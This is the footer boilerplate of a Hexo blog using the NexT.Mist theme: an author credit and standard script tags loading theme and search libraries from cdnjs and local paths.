  <span class="author" itemprop="copyrightHolder">Thuri</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
